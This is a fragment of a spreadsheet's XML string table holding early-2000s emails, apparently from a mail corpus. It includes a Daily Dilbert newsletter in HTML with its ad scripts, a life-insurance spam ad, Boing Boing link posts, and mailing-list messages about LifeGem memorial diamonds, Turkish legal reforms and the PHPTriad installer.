 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D95-Xdhr-zdzmPTSte5b24rxZ_41"&gt;
 --16551393.1027075822193.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lego harpsichord: A for Obsessiveness, F for Tunefulness
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541036
 Date: Not supplied
 Yet another Lego obsessive has built a working Lego harpsichord. Tons of points 
 for style, but damn, it sounds like hell. Link[1] Discuss[2] (_Thanks, Tim[3]!_
 )
 [1] http://www.henrylim.org/Harpsichord.html
 [2] http://www.quicktopic.com/boing/H/HuXcCLLHKEv
 [3] http://www.sff.net/people/timpratt/tropism.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Best Policies for Less Than a Dollar a Day!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#FFFBE0"&gt;
 &lt;center&gt;
 &lt;font face="verdana" size="1" color="#000000"&gt;smart shoppers &lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="1" color="#0000ff"&gt;click here&lt;/font&gt;
 &lt;/a&gt; for the best rates&lt;/font&gt;&lt;br&gt;
 &lt;table border="0" cellpadding="2" cellspacing="0"&gt;
  &lt;tr&gt;
   &lt;td bgcolor="#000000"&gt;
    &lt;table bgcolor="#ffffff" border="0" width="470" cellpadding="8" cellspacing="0"&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;Paying Too Much for Life Insurance?
       &lt;br&gt;&lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="4" color="#0000ff"&gt;Click Here to Save 70% on Your Policy&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="left"&gt;
       &lt;br&gt;
       &lt;font face="verdana" size="2" color="#000000"&gt;In today's world, it's important to expect the unexpected.  When preparing for
       the future, we must always consider our family.  To plan for your family's future, &lt;i&gt;the right life insurance policy is a 
       necessity.&lt;/i&gt; But who wants to pay too much for life insurance?  Let us help you find &lt;b&gt;the right quote, quickly and 
       easily... &lt;/font&gt;&lt;font face="verdana" size="2" color="#ff0000"&gt;for FREE.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="verdana" size="4" color="#737373"&gt;&lt;b&gt;Compare your coverage...&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
      &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$250,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$6.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month&lt;/font&gt;
       &lt;br&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$500,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$9.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month&lt;/font&gt;
       &lt;br&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$1,000,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$15.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month!&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="4" color="#0000ff"&gt;&lt;b&gt;Get a FREE Instant Quote&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="3" color="#8B0909"&gt;&lt;b&gt;&lt;i&gt;Prepare for your family's future&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       &lt;font face="arial" size="1" color="#737373"&gt;Compare the lowest prices from the top insurance companies in the nation&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
    &lt;/table&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: lifegem
</t>
  </si>
  <si>
    <t xml:space="preserve">this just struck me as odd, but interesting in a way i guess.
 http://www.lifegem.com/index.htm
 What is a LifeGem?
 A LifeGem is a certified, high quality diamond created from the carbon of 
 your loved one as a memorial to their unique and wonderful life.
 Chris
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: There will be no Trojan War
</t>
  </si>
  <si>
    <t xml:space="preserve">(pace Giraudoux)
 To be more precise, I believe that there will be no "war of civilizations"
 between the Western and the Muslim, and not because of drum-beating or
 war-mongering from some parts, but due to stuff like this:
   http://www.lemonde.fr/article/0,5987,3210--286553-,00.html
 &gt;L'assemble nationale turque a ralis l'impossible : pour satisfaire
 &gt;aux demandes de l'Union europenne, le Parlement, lors d'une session
 &gt;qui a dur plus de seize heures, a, aboli la peine de mort (sauf en
 &gt;cas de guerre), limin les obstacles lgaux  l'ducation et  la
 &gt;diffusion en langue kurde, lev certaines restrictions rendant
 &gt;l'organisation de manifestations difficile et mis fin  l'imposition
 &gt;de peines pour critiques envers l'arme ou d'autres institutions tatiques.
 i.e., 
 &gt;The Turkish National Assembly achieved the impossible: to satisfy
 &gt;European Union demands, the Parlement, during a session lasting more
 &gt;than sixteen hours, abolished the death penalty (except in war time),
 &gt;eliminated legal obstacles to teaching and spreading of the Kurdish
 &gt;language, lifted certain restrictions making it difficult to organise
 &gt;protest marches and ended penalties imposed for criticism of the army
 &gt;and other state institutions.
 This is the way forward, IMO.  Just wait a couple of years until
 66 million Muslim Turks are making great strides towards democracy
 and prosperity in the E.U. and Syria, Lebanon etc start lining up and
 making similar decisions.
 Of course there are hard-liners who would be right at home on
 Rumsfeld's staff, but they got out-voted:
 &gt;La peine de mort s'est rvle le sujet le plus pineux : les
 &gt;ultra-nationalistes taient dtermins  obtenir la pendaison du
 &gt;dirigeant du PKK (kurde), Abdullah calan, considr par les Turcs
 &gt;comme personnellement responsable de la mort de plus de 30 000
 &gt;personnes.  calan avait t condamn  mort en juin 1999, mais le
 &gt;gouvernement avait accept d'attendre le verdict de la Cour europenne
 &gt;des droits de l'homme avant de l'excuter.  De nombreux nationalistes
 &gt;estimaient galement que l'octroi de droits culturels aux Kurdes
 &gt;reprsenterait une concession aux revendications des "terroristes".
 i.e.,
 &gt;The death penalty turned out to be the thorniest issue: the
 &gt;ultra-nationalists were determined to secure the hanging of the PKK
 &gt;leader, Abdullah calan, considered by the Turks to be personally
 &gt;responsible for the deaths of more than 30,000 people.  calan had
 &gt;been condemned to death in June 1999, but the government had accepted
 &gt;to wait for the verdict of the European Court of Human Rights before
 &gt;executing him.  Many nationalists also believed that handing cultural
 &gt;rights to the Kurds would constitute a concession to "terrorist"
 &gt;demands.
 Over 'n out,
   Rob.
      .-.                                                               .-.
     /   \           .-.                                 .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'                     `-'         \   /
              `-'                                               `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rats' intestines and pigs' teeth
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85497383
 Date: Not supplied
 This is the headline of the month, possibly the year: "Doctors Grow Pig Teeth 
 in Rat Intestines." Do we even need to read the story to understand it? It's 
 like a freaking _haiku_ of near-singularity, future-shocky wonderment! 
     U.S. doctors said on Thursday they have managed to grow living pig teeth in 
     rats, a feat of biotechnology that experts said could spark a dental 
     revolution. 
     Researchers at Boston's Forsyth Institute said their successful experiment 
     suggests the existence of dental stem cells, which could one day allow a 
     person to replace a lost tooth with an identical one grown from his or her 
     own cells. 
     "The ability to identify, isolate and propagate dental stem cells to use in 
     biological replacement tooth therapy has the potential to revolutionize 
     dentistry," said Dominick DePaola, president and CEO of the institute that 
     focuses on oral and facial science.  
 Link[1] Discuss[2] (_Thanks, Dave[3]!_)
 [1] http://story.news.yahoo.com/news?tmpl=story&amp;ncid=585&amp;e=1&amp;cid=585&amp;u=/nm/20020926/sc_nm/health_teeth_dc
 [2] http://www.quicktopic.com/boing/H/88cUs6CumjiX
 [3] http://www.remtullaeurorscg.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Nick
 Try PHPTriad
  http://download.com.com/3000-2165-6474268.html?tag=lst-0-1
 "PHPTriad is a complete PHP development and server environment for Windows.
 It installs PHP, Apache, MySQL, and PHPMyAdmin, both installing and setting
 up the environment. Version 2.11 updates all components and it now includes
 Perl 5."
 HTH
 Will
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/17/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--25685224.1026891797705.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --25685224.1026891797705.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3Df9-mtITQxOZLWlluKKSMfs3MbfwfsRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D0e--eDTIiQKhA9L4NS4rLdEHR-t69RR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D23-sFrGINMN0Cu_0ItiAg2jtuP2j9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D38-bLgmIRM=
 ALJwXckQnhYi2ZpexcRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/17/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D4d--Ui=
 sIKZgQ-nrJUCdaN021jq-0dRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D63-tPIjIHW5saXNVQTg_s-ssJL9E9RR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
